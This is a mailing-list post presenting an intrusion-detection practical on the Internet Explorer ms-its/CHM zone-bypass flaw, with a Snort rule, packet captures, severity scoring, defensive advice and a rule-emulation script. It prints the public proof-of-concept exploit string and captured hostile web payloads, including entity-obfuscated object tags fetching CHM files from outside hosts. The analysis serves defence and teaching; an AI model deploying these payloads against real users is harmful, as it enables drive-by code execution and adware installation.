LOGS: GIAC GCIA Version 3.4 Practical Detect James Affeld: msg#00071

Subject: LOGS: GIAC GCIA Version 3.4 Practical Detect James Affeld

Greetings: I'm going to submit this fairly soon.
Comments welcome, criticism encouraged, enlightenment
and wise counsel craved. My apologies for the trace
munging.
--
Source of Trace: a network I administer.

Detect was Generated by: Snort v. 2.1.2 with a
custom rule placed in local.rules.

#Bugtraq 9658 IE CHM vulnerability
alert tcp any $HTTP_PORTS -> $HOME_NET any \
  (msg:"ms-its .CHM file download!"; flow:from_server,established; \
  content:!"children"; nocase; content:".chm\:"; nocase; \
  content:"its"; nocase; \
  classtype:successful-admin; sid:1000024; rev:2;)

This rule directs Snort to alert on any packet from
an established connection on port 80 or 443 (the http
and https ports defined for $HTTP_PORTS in
snort.conf) to an internal host on any port whose
content does not include "children", but whose
content does include both ".chm:" (the backslash in
the rule only escapes the colon) and "its". None
of the content checks are case sensitive. The
signature id for this rule is 1000024 (in the >
1000000 range set aside by the writers of Snort for
local rules) and this is the second revision.

In version 2 I excluded the content "children" to
eliminate false positives from users going to the
Children's Hospital website, www.chmc.org.

That rule generated the following alert:

[**] [1:1000024:2] ms-its .CHM file download! [**]
[Classification: Successful Administrator Privilege
Gain] [Priority: 1]
05/10-16:06:13.150822 66.98.248.63:80 ->
foo.bar.100.36:2365
TCP TTL:52 TOS:0x0 ID:12487 IpLen:20 DgmLen:684 DF
***AP*** Seq: 0x88DA02C1 Ack: 0xC7082B6C Win:
0x1920 TcpLen: 20

Alert Description: rule #1000024, revision 2, caused
the alert. The classification is my categorization
of the incident this alert detects: basically,
though current usage is mostly for pushing adware
and other criminal computer intrusions, it is
possible to do pretty much anything to a victim
machine with it. The next line has the date stamp,
source IP address and port, and destination IP
address (cleverly obfuscated) and port. The
remaining two lines have information about the
packet that isn't relevant to this discussion.

Description of the Attack: Bugtraq 9658
(http://www.securityfocus.com/bid/9658/exploit/)
reports that hostile websites can induce Internet
Explorer to download and use (via the Windows Help
system) arbitrary files, which leads to arbitrary
code execution. The rule that detected this attack
is easily defeated by obfuscation, but I see traffic
from bozos who can't be bothered to modify a single
string in the poc code on the Bugtraq site! The
following lines are from the Bugtraq page cited
above:

"Jelmer also released the following proof-of-concept
example which may potentially bypass some filters
due to using encoded characters in the exploit
string:

ms-its:mhtml:file://C:\foo.mht!${PATH}/EXPLOIT.CHM::/exploit.htm
"

Here is the tcpdump output of the packet that
triggered the alert. The attacking website's failure
of imagination is plain to see in the request line
(the unchanged EXPLOIT.CHM file name).

16:06:58.879664 foo.bar.100.36.2365 >
66.98.248.63.80: P 437:658(221) ack 645 win 64891
(DF) (ttl 128, id 13542)
0000: 4500 0105 34e6 4000 8006 7daafoobar6424
E...4æ@...}ª¨.d$
0010: 4262 f83f 093d 0050 c708 2b6c 88da 0545
Bbø?.=.PÇ.+l.Ú.E
0020: 5018 fd7b b2af 0000 4745 5420 2f2f 4558
P.ý{²¯..GET //EX
0030: 504c 4f49 542e 4348 4d20 4854 5450 2f31
PLOIT.CHM HTTP/1
0040: 2e31 0d0a 4163 6365 7074 3a20 2a2f 2a0d
.1..Accept: */*.
0050: 0a41 6363 6570 742d 456e 636f 6469 6e67
.Accept-Encoding
0060: 3a20 677a 6970 2c20 6465 666c 6174 650d
: gzip, deflate.
0070: 0a55 7365 722d 4167 656e 743a 204d 6f7a
.User-Agent: Moz
0080: 696c 6c61 2f34 2e30 2028 636f 6d70 6174
illa/4.0 (compat
0090: 6962 6c65 3b20 4d53 4945 2036 2e30 3b20
ible; MSIE 6.0;
00a0: 5769 6e64 6f77 7320 4e54 2035 2e30 3b20
Windows NT 5.0;
00b0: 2e4e 4554 2043 4c52 2031
.NET CLR 1

Probability the Source Address was Spoofed: pretty
low. This is part of an established tcp session, so
simple spoofing (where the attacker doesn't care
about receiving responses) is not going on. It is
possible to spoof a tcp connection, but the attacker
would have to be between the source and (real)
destination, either in fact or by successfully using
source routing to get traffic to go through the
attacker. Then the attacker would have to
successfully guess the ISN (Initial Sequence Number)
to impersonate one of the hosts. The internal host
is running currently patched Windows 2000, which is
only mildly vulnerable to ISN guessing.
(http://razor.bindview.com/publish/papers/tcpseq.html)

Description of the Attack:
From
http://www.security.nnov.ru/search/news.asp?binid=3590:
"HTTP redirection to ms-its (and few others)
protocol exploiting directory traversal bug cause
CHM file to be saved to known location. With another
directory traversal bug HTML from CHM file can be
executed in local zone." Per Bugtraq: "The issue may
be exploited via the ITS (InfoTech Storage) Protocol
URI handler. It is possible to use this protocol to
force a browser into the Local Zone by redirecting
into a non-existent MHTML file (using other known
vulnerabilities). In this manner, it may be possible
to reference hostile content to be executed in the
Local Zone, such as a malicious CHM file. The issue,
in combination with other vulnerabilities, is
exploitable to provide for automatic delivery and
execution of an arbitrary executable. This would
occur when malicious web content is rendered in
Internet Explorer. "
(http://www.securityfocus.com/bid/9658/discussion/)

Correlations: There is a nice page describing how
to use the feature for Good at:
http://www.helpware.net/htmlhelp/linktochm.htm

http://spamwatch.codefish.net.au/modules.php?op=modload&name=News&file=article&sid=121
has a description about "yet another trojan site
using the Microsoft Window CHM exploit."

Evidence of Active Targeting: This question is
usually "specific or random" targeting. In this
case, since the webserver just sits there waiting
for us to come to it, I'd say it's passive
targeting.

Severity: Severity of the incident is given by the
formula:

severity = (criticality + lethality) - (system
countermeasures + network countermeasures)

Criticality: 2 This is a standard workstation,
easily re-imaged, containing no significant local
data.

Lethality: 5 "Automatic delivery and execution of an
arbitrary executable" = 0wn3d

System Countermeasures: 2 We do what we can, but
short of crippling the Help system, we can't really
mitigate this. There is currently no patch for IE.
Using another browser will still (probably) invoke
IE to invoke the CHM. (Thanks to all those users
who clamored to have the browser irrevocably fused
to the OS. Somehow I think all of those users are
located at 1 Microsoft Way, and were in the minority
even there.)

Network Countermeasures: 3 We catch this via IDS,
but we do not have a means of preventing this
content from reaching the desktop. A proxy server
might give us a way to do this, or an application
firewall. The offending website (and its neighbors)
are now blocked at the router.

Severity = (2+5) - (2+3) = 2

Defensive Recommendation: a web proxy with the
ability to block pages with specific content would
give us the means to do more than just watch this
stuff as it goes whizzing past the IDS. Blocking
and shaming the offending websites might do some
good.

Multiple Choice Question:

An effective way to mitigate the Microsoft Internet
Explorer ITS Protocol Zone Bypass Vulnerability is:

A) Use another browser besides Internet Explorer
B) Proxy Server with filtering ability
C) Disable the ms-its protocol handler, which
"may have a negative impact on the Windows Help
system"
D) Use another operating system besides Windows

Answer: B, C, and D. A may not work against this,
because Windows will invoke Internet Explorer for .CHM
files unless you have gone to extreme lengths to
disable it.

Misc. Other Captures:

In this sample, we don't just have the simple POC
code swiped directly from the bugtraq announcement.
No! They had to have the Extra Evil poc, with extra
obfuscation suggested by "Jelmer" on the Bugtraq
site. To review, Jelmer substitutes '#109' for 'm'
- they are synonymous. Here is Jelmer's suggestion
in full:

"ms-its:mhtml:file://C:\foo.mht!${PATH}/EXPLOIT.CHM::/exploit.htm"

Since it is harder to write '#109' and they do not
similarly obfuscate the other letters, this looks
like they are trying to hide something. Here's the
excerpted bit:

'<object data="&#109;s-its:&#109;ht&#109;l:
file://C:counter.mht!${PATH}/HELP.CHM

For some reason, the alleged people at
savings-direct.com don't want to send the string
'ms-its:mhtml' across the wire. This is enough to
wish that all their hopes wither until they decide
to make an honest living.

bash-2.05b# tcpdump -nvvXr tcpdump.log.1083808507
'host 206.58.237.235' | more
07:43:38.182150 206.58.237.235.80 >
foo.bar.104.61.1553: P [tcp sum ok] 22258004
21:2225801059(638) ack 3254538726 win 6432 (DF) (ttl
55, id 61392)
0000: 4500 02a6 efd0 4000 3706 8481 foobar edeb
E..¦ïÐ@.7...Î:íë
0010: a89c 683d 0050 0611 84ab 04e5 c1fc 51e6
¨.h=.P...«.åÁüQæ
0150: 456e 636f 6469 6e67 3a20 6368 756e 6b65
Encoding: chunke
0160: 640d 0a43 6f6e 7465 6e74 2d54 7970 653a
d..Content-Type:
0170: 2061 7070 6c69 6361 7469 6f6e 2f78 2d6a
application/x-j
0180: 6176 6173 6372 6970 740d 0a45 7870 6972
avascript..Expir
0190: 6573 3a20 5468 752c 2030 3620 4d61 7920
es: Thu, 06 May
01a0: 3230 3034 2031 343a 3433 3a32 3220 474d
2004 14:43:22 GM
01b0: 540d 0a0d 0a65 360d 0a0a 7070 203d 2027
T....e6...pp = '
01c0: 6874 7470 3a2f 2f61 6473 2e73 6176 696e
http://ads.savin
01d0: 6773 2d64 6972 6563 742e 6e65 742f 636f
gs-direct.net/co
01e0: 756e 7465 7227 3b0a 0a63 6f64 6520 3d20
unter';..code =
01f0: 273c 6f62 6a65 6374 2064 6174 613d 2226
'<object data="&
0200: 2331 3039 3b73 2d69 7473 3a26 2331 3039
#109;s-its:&#109
0210: 3b68 7426 2331 3039 3b6c 3a66 696c 653a
;ht&#109;l:file:
0220: 2f2f 433a 636f 756e 7465 722e 6d68 7421
//C:counter.mht!
0230: 247b 5041 5448 7d2f 4845 4c50 2e43 484d
${PATH}/HELP.CHM
0240: 3a3a 2f68 656c 702e 6874 6d22 2074 7970
::/help.htm" typ
0250: 653d 2274 6578 742f 782d 7363 7269 7074
e="text/x-script
0260: 6c65 7422 3e3c 2f6f 626a 6563 743e 273b
let"></object>';
0270: 0a64 6f63 756d 656e 742e 7772 6974 6528
.document.write(
0280: 636f 6465 2e72 6570 6c61 6365 282f 5c24
code.replace(/\$
0290: 7b50 4154 487d 2f67 2c70 7029 293b 0a0d
{PATH}/g,pp));..
02a0: 0a30 0d0a 0d0a
.0....
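To check what the rule's content logic does and does not catch in the capture above, here is an added Python example (not from the original post and not Snort itself): it parses tcpdump -X hex lines into bytes, emulates the three content checks of sid 1000024, and compares them with a literal "ms-its" match and with a hypothetical pre-match HTML-entity decode. The input is offsets 0x01f0-0x0240 of the savings-direct bytes shown above; the decode step is my own hardening idea, not part of the page's rule.

```python
import html
import re

# Emulation of the content checks in the page's local.rules signature
# (sid 1000024 rev 2): no "children" anywhere, and both ".chm:" and "its"
# present, all case-insensitive. This is an emulation, not Snort.
def rule_1000024_matches(payload: bytes) -> bool:
    text = payload.decode("latin-1").lower()
    if "children" in text:          # content:!"children" (chmc.org exclusion)
        return False
    return ".chm:" in text and "its" in text

# A literal "ms-its" check, which the entity-encoded variant evades.
def literal_ms_its(payload: bytes) -> bool:
    return b"ms-its" in payload.lower()

# Hypothetical hardening: resolve HTML character references (&#109; -> m)
# before running the same checks. Not part of the page's rule.
def rule_after_unescape(payload: bytes) -> bool:
    decoded = html.unescape(payload.decode("latin-1"))
    return rule_1000024_matches(decoded.encode("latin-1"))

# tcpdump -X style line: 4-digit offset, 2-byte hex groups, optional
# trailing ASCII column (ignored). Pure ASCII-column lines do not match.
HEX_LINE = re.compile(
    r"^\s*[0-9a-f]{4}:((?:\s+[0-9a-f]{4})+(?:\s+[0-9a-f]{2})?)", re.I)

def hexdump_to_bytes(dump: str) -> bytes:
    out = bytearray()
    for line in dump.splitlines():
        m = HEX_LINE.match(line)
        if m:
            out += bytes.fromhex(m.group(1).replace(" ", ""))
    return bytes(out)

# Offsets 0x01f0-0x0240 of the savings-direct capture quoted on the page,
# copied here as the constructed test input (ASCII column omitted).
SAMPLE_DUMP = """\
01f0: 273c 6f62 6a65 6374 2064 6174 613d 2226
0200: 2331 3039 3b73 2d69 7473 3a26 2331 3039
0210: 3b68 7426 2331 3039 3b6c 3a66 696c 653a
0220: 2f2f 433a 636f 756e 7465 722e 6d68 7421
0230: 247b 5041 5448 7d2f 4845 4c50 2e43 484d
0240: 3a3a 2f68 656c 702e 6874 6d22 2074 7970
"""

if __name__ == "__main__":
    payload = hexdump_to_bytes(SAMPLE_DUMP)
    print(payload.decode("latin-1"))
    print("literal ms-its:", literal_ms_its(payload))      # False
    print("sid 1000024   :", rule_1000024_matches(payload))  # True
```

The emulation shows why the rule still fired on this sample: the obfuscation only touches the letter "m", while ".CHM::" and "its" in "s-its" survive untouched.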

Netwin is adware/spyware - in other words, your
basic computer intrusion.
Source host is COLO-CHN1.
Packet excerpt is:
01a0: 0a3c 424f 4459 3e0a 3c74 6578 foobar 7265
.<BODY>.<textare
01b0: 6120 6964 3d22 636f 6465 2220 7374 796c
a id="code" styl
01c0: 653d 2264 6973 706c 6179 3a6e 6f6e 6522
e="display:none"
01d0: 3e3c 6f62 6a65 6374 2064 6174 613d 2226
><object data="&
01e0: 2331 3039 3b73 2d69 7473 3a6d 6874 6d6c
#109;s-its:mhtml
01f0: 3a66 696c 653a 2f2f 433a 5c66 6f6f 2e6d
:file://C:\foo.m
0200: 6874 2168 7474 703a 2f2f 3230 332e 3139
ht!http://203.19
0210: 392e 3230 302e 3632 2f6e 6f6e 616d 652f
9.200.62/noname/
0220: 7368 6172 6569 742f 6578 2f4e 4554 5749
shareit/ex/NETWI
0230: 4e2e 4348 4d3a 3a2f 6e65 7477 696e 2e68
N.CHM::/netwin.h
0240: 746d 2220 7479 7065 3d22 7465 7874 2f78
tm" type="text/x
0250: 2d73 6372 6970 746c 6574 223e 3c2f 6f62
-scriptlet"></ob
0260: 6a65 6374 3e3c 2f74 6578 7461 7265 613e
ject></textarea>
0270: 3c73 6372 6970 7420 6c61 6e67 7561 6765
<script language
0280: 3d22 6a61 7661 7363 7269 7074 223e 646f
="javascript">do
0290: 6375 6d65 6e74 2e74 6974 6c65 203d 2027
cument.title = '
http://www.danchan.com/weblog/vjen says,
"We have Enterasys Dragon signatures that trigger
for these kinds of bugs, and today I garnered some
faint interest in investigating them today. I found
a shitload of occurrences of this NETWIN.CHM file
showing up in advertisements. Advertising companies
on shady sites we all love to visit using IE bugs to
push adware to your computers. Yay! After work, I
did a little investigating.

These 'compiled' microsoft html help files can
execute programs.

NETWIN.CHM expands to the following:

07/06/2003 12:36 AM 65 blank.html
10/29/2002 02:39 AM 898 folder.gif
10/29/2002 02:39 AM 920 folderopen.gif
10/29/2002 05:14 PM 229 home.gif
04/26/2004 04:32 PM 324 index.html
11/08/2002 10:12 PM 5,888 JSCookTree.js
04/26/2004 04:32 PM 642 menu.htm
04/26/2004 04:32 PM 653 NETWIN.hhc
04/26/2004 04:32 PM 366 NETWIN.hhk
04/26/2004 04:32 PM 1,536 netwin.htm
10/29/2002 02:39 AM 155 page.gif
06/27/2003 11:49 PM 3,842 preview.gif
11/23/2002 12:04 AM 701 theme.css
11/22/2002 11:15 PM 199 theme.js "

_______________________________________________
Intrusions mailing list
Intrusions@xxxxxxxxxxxxxx
http://www.dshield.org/mailman/listinfo/intrusions